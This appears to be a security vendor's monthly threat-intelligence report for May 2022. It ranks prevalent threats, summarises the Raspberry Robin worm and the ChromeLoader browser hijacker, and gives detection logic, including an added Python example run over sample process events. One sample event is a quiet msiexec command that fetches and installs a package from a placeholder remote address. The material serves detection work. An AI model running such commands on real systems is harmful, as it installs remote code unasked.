Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.
Highlights
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months. Here’s how the numbers shook out for May 2022:
May rank | Threat name | Threat description
---|---|---
➡ 1* | | Collection of Python classes to construct/manipulate network protocols
⬆ 1* | | Open source tool that dumps credentials using various techniques
⬆ 3 | | Dropper/downloader, often distributed through search engine redirects
⬆ 4 | | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives
⬆ 5* | | Open source tool used to identify attack paths and relationships in Active Directory
⬇ 5* | | Penetration testing tool that integrates functionality from multiple offensive security projects and leverages a native scripting language
⬇ 5* | | Activity cluster using a worm spread by external drives that leverages Windows Installer to download a malicious DLL
⬆ 8 | Metasploit | Penetration testing framework with a robust set of tools for exploiting vulnerabilities and executing code on a remote target machine
⬇ 9* | | Banking trojan focused on stealing user data and banking credentials; delivered through phishing, existing Emotet infections, and malicious Windows Installer (MSI) packages
⬇ 9* | | Malware family associated with ad fraud activity through the distribution of adware applications
⬇ 9* | | Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects

⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
* Denotes a tie
Observations on trending threats
Overall threat volume increased slightly in May, with 13.3 percent of Red Canary customers encountering at least one named threat (up from 12.7 percent in April, but still below March’s 14.3 percent mark). Despite some typical shuffling, the prevalent threats this month were all within a few spots of last month’s top 10. Notably, after diving a little deeper into the differences between Gootkit and Gootloader, we’ve started to distinguish the more commonly observed Gootloader activity from the less common Gootkit payload. We previously tracked all of this activity under Gootkit, and the historical numbers for Gootloader referenced above reflect both Gootloader and Gootkit activity.
Blog posts published this month
In May, Red Canary published research on two threats: Raspberry Robin and ChromeLoader. In case you missed them, we’ve provided summaries here as well as links to the full articles.
Raspberry Robin
Raspberry Robin is Red Canary’s name for a cluster of USB worm activity that we’ve been tracking since September 2021. If that name sounds familiar, it might be because we’ve shared information about Raspberry Robin with you in previous Intelligence Insights as it climbed the charts. In early May, we also published a blog on Raspberry Robin with our research on this threat.
Raspberry Robin appears to spread via infected USB drives. When the infected drive is plugged into a system, a shortcut (LNK file) masquerading as a legitimate folder is executed. In its first phase of activity, Raspberry Robin uses msiexec.exe to reach out to a malicious IP address for command and control (C2) communication.
Detection opportunity: msiexec.exe downloading and executing packages
To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages from the command line will give you the opportunity to examine the activity and determine whether it’s malicious.
process == (msiexec)
&&
process_command_line_includes == (http:, https:)
&&
process_command_line_includes == (/q, -q)
Over the past few weeks, we’ve heard from a number of security professionals who have spotted Raspberry Robin in their environments. We continue to monitor, track, and research Raspberry Robin activity and incorporate new information as necessary.
ChromeLoader
ChromeLoader is a pervasive and persistent browser hijacker that modifies its victims’ browser settings and redirects user traffic to advertisement websites. This malware is introduced via an ISO file that baits users into executing it by posing as a cracked video game or pirated movie or TV show. It eventually manifests as a browser extension.
Like most suspicious browser extensions, ChromeLoader is a relatively benign threat that hijacks user search queries and redirects traffic to an advertising site. However, ChromeLoader uses PowerShell to inject itself into the browser and add a malicious extension to it, a technique we don’t see very often (and one that often goes undetected by other security tools). If applied to a higher-impact threat—such as a credential harvester or spyware—this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user’s browser session.
Detection opportunity: PowerShell spawning chrome.exe containing load-extension and AppData\Local within the command line
The detection analytic looks for instances of the Chrome browser executable spawning from PowerShell with a corresponding command line that includes load-extension and appdata\local as parameters.
parent_process_name == powershell.exe
&&
process_name == chrome.exe
&&
command_line_includes (AppData\Local, load-extension)
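Both detection opportunities in this post (the msiexec.exe analytic from the Raspberry Robin section and the PowerShell/chrome.exe analytic above), written out as Python predicates and run over constructed process events. This is an added worked example, not Red Canary's code; the event field names, the placeholder address and the sample command lines are assumptions, not telemetry from this report.

```python
# Added example (not Red Canary's code): the post's two detection analytics as
# Python predicates run over constructed process events. Event field names and
# the sample telemetry are assumptions; adapt them to your EDR/SIEM schema.
from typing import NamedTuple

class ProcessEvent(NamedTuple):
    process_name: str
    parent_process_name: str
    command_line: str

def detect_msiexec_remote_install(ev: ProcessEvent) -> bool:
    """msiexec.exe fetching a package from a URL with a quiet flag (Raspberry Robin)."""
    if ev.process_name.lower() != "msiexec.exe":
        return False
    cmd = ev.command_line.lower()
    has_url = "http:" in cmd or "https:" in cmd
    # "/q" and "-q" also cover /qn, /qb and -quiet; analysts triage the hits.
    has_quiet = "/q" in cmd or "-q" in cmd
    return has_url and has_quiet

def detect_powershell_chrome_extension(ev: ProcessEvent) -> bool:
    """PowerShell spawning chrome.exe with load-extension under AppData\\Local (ChromeLoader)."""
    cmd = ev.command_line.lower()
    return (ev.parent_process_name.lower() == "powershell.exe"
            and ev.process_name.lower() == "chrome.exe"
            and "load-extension" in cmd
            and "appdata\\local" in cmd)

def run_detections(events):
    """Return (event index, analytic name) for every event that fires an analytic."""
    analytics = {"msiexec_remote_install": detect_msiexec_remote_install,
                 "powershell_chrome_extension": detect_powershell_chrome_extension}
    return [(i, name) for i, ev in enumerate(events)
            for name, fn in analytics.items() if fn(ev)]

# Constructed sample telemetry; the address and file paths are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("msiexec.exe", "cmd.exe", "msiexec /q /i http://203.0.113.10:8080/pkg.msi"),
    ProcessEvent("msiexec.exe", "explorer.exe", r"msiexec /i C:\Installers\vendor.msi"),
    ProcessEvent("chrome.exe", "powershell.exe",
                 r"chrome.exe --load-extension=C:\Users\u\AppData\Local\ext"),
    ProcessEvent("chrome.exe", "explorer.exe", "chrome.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for i, name in run_detections(SAMPLE_EVENTS):
        print(f"event {i}: {name}: {SAMPLE_EVENTS[i].command_line}")
```

The local-only msiexec install and the chrome.exe launched from explorer.exe are included so the predicates are seen to stay quiet on ordinary activity.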
For more details and additional opportunities to detect this pushy malvertiser, check out our May blog post.